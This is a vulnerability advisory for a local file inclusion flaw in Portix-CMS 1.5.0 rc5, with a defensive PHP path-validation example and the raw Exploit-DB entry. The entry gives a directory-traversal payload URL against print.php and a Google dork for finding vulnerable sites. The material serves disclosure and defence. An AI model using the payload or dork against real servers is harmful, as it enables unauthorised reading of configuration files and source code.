Vendor: Portix-CMS
By: Or4nG.M4n
CVSS: 7.5 HIGH
Local File Inclusion
CWE: 22
Product Name: Portix-CMS
Affected Version From: v1.5.0. rc5
Affected Version To: v1.5.0. rc5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8

Portix-CMS 1.5.0. rc5 Local File Inclusion

Portix-CMS 1.5.0. rc5 is vulnerable to Local File Inclusion (LFI). An attacker can exploit this vulnerability by sending a crafted HTTP request whose page parameter contains directory traversal sequences followed by a file name. This allows the attacker to read sensitive files from the server, such as configuration files and source code. The vulnerable URL is http://<=- Domain -=>/<=- Path -=>/print.php?page=../../../../../../../../../../[LFI].

Mitigation:

To mitigate this vulnerability, the application should be configured to allow access only to files that are necessary for it to function, and only to files located within the application's directory structure.
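
One way to implement the containment described in the mitigation, as an added example in PHP that is not Portix-CMS code or the advisory author's. The function name `resolve_page`, the `pages/` directory layout and the sample files are assumptions made for illustration.

```php
<?php
// Added example: hypothetical resolver for a "page" parameter like the one in
// print.php. resolve_page() and the pages/ layout are assumptions, not Portix-CMS code.

function resolve_page(string $baseDir, string $page): ?string
{
    // 1. Allowlist the name format: no slashes, dots, backslashes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    // 2. Canonicalise both paths; realpath() resolves symlinks and "..",
    //    and returns false when the file does not exist.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    // 3. Containment check: the resolved file must sit under the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed demo: a temporary pages directory with one legitimate page,
// plus a file outside it and a symlink that points out of the directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/news.php', '<?php echo "news";');
file_put_contents($root . '/secret.php', '<?php // outside the pages directory');
@symlink($root . '/secret.php', $root . '/pages/link.php'); // may fail on Windows

$inputs = ['news', '../secret', '..\\secret', "news\0", 'link', 'missing'];
foreach ($inputs as $input) {
    $path = resolve_page($root . '/pages', $input);
    printf("%-14s => %s\n", json_encode($input), $path === null ? 'rejected' : 'allowed');
}
// In the request handler (assumed shape), answer 404 on null and never pass
// the raw parameter to include or readfile:
//   $path = resolve_page(__DIR__ . '/pages', (string)($_GET['page'] ?? ''));
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

The name allowlist and the realpath() containment check are independent layers: the first rejects traversal sequences outright, the second catches symlinks and any path that still resolves outside the base directory.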

Exploit-DB raw data:

-==================== in The Name Of aLLah ====================- 
# Title: Portix-CMS 1.5.0. rc5 Local File Inclusion
# Google Dork: inurl:livriel.php?livriel=
# Date: n/a
# Author: Or4nG.M4n
# Link: http://www.easy-script.com/scripts-PHP/portix-cms-150-rc5-3005.html
# Version: v1.5.0. rc5
# Tested on: windows 8
# Home : 1337r1z.wordpress.com | sec4ever.com | Tryag.cc | cc.7rs.org

~ ( Exploit Local File ) ~ 

1 . http://<=- Domain -=>/<=- Path -=>/print.php?page=../../../../../../../../../../[LFI]

~ ( Greetz ) ~
<=[  sA^Dev!L , i-Hmx , Fox ,  Lagripe-dz , And Welcome back sec4ever.com ... ]=>
-==================== in The Name Of aLLah ====================-